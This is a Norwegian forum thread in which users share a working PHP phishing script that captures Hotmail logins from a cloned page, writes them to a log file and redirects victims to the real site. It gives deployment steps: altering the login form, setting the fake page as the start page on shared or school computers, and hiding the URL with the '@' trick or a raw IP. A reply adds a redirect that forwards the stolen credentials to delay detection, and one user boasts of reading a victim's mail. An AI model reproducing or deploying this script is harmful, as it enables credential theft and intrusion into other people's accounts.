Laget et lite script som logger username og passwords som blir skrevet inn fra en falsk side.

http://www.hotmail.com@home.no.net/h...otmail/msn.htm

Det som blir skrevet inn der havner på:
http://home.no.net/hovli/hotmail/lp.htm

Filkodene:

Theft.php

----------------------------------------------
<?
$lp = fopen("lp.htm", "a"); //the log file

fwrite($lp, "<b>Login:</b> $login <br> <b>Password:</b> $passwd <br><br>
"
);

?>

<script>
window.location="http://www.hotmail.com"
</script>
----------------------------------------------

Så må du lagre www.hotmail.com, og forandre på password form til:
<FORM name=passwordform action=theft.php method=post target=_top>

Så uploader du alt dette til en side som støtter php, og setter chmod 777 på lp.htm.

Deretter finner du noen pcer som har flere brukere, etc. og setter http://www.hotmail.com@dinurl/til/ho...html/filen.htm som startside. Eller så kan du logge deg inn på den siden, og viske bort alt i adresselinjen, og skrive http://www.hotmail.com/ som adresse, uten å trykke enter eller noe.

Hvis noen idioter som har hotmail ser dette, så kan det godt være de kommer på "aha! jeg tror jeg skjekker mailen min!" Når de så ser theft.php, hvis de rekker det i det hele da, så er det uansett for sent, og du kan kose deg

Bruk på egen risk.

Dette er nok ikke den beste måten, men dette er slik jeg gjorde det.

Tørr jeg gjette på hvor du fikk denne ideen fra? hehe..

Scha

Hvor faen ble det av vedlegget? Jaja her er det

Scha: www.astalavista.com
Men leste også i den BVP om det der med å sette som starteside på skolen. Smart

Pass på å forwarde info'en til scriptet til msn som sender dem til inbox'en. Tar MYE lengre tid før du blir merka da.

har hørt om det ja, men jeg vet ikke hvordan jeg gjør det.

Sett et form med de variablene du tok imot i value feltene og få det til å execute etter 0 sekunder.

eller:

<?php

Header("Location: hotmail.com/wherever.fuck?login=$login&passwd=$passwd");

?>

Scha

Ja, eller det. Tenkte ikke på querystring. ;]

takker for kult script.. testa det og funket kult

leste nettopp noen hotmails til en dude, og skaffet meg noen pass! )

en ting til... IKKE bruk eksempelt mitt til å lure folk.. vil liksom ikke bli busta eller noe..

og istedenfor å bruke home.no.net url bør du heller bruke ip'en til siden. da er det mindre sjanse for at folk skal merke @'en og urlen.

feeett

Ja, gusto's right... alt for mistenkelig

det var noen jævlige bilder du hadde på den sida

aaargggghhh så jævlig!!!!!!

tøft script tho

STRIP TAGS FFS #%"#%"#

EKLE BILDER#"%

hehe jeg gidder ikke mekke på det, sånn at de som bruker html tags som passord ikke fucker opp lp.htm siden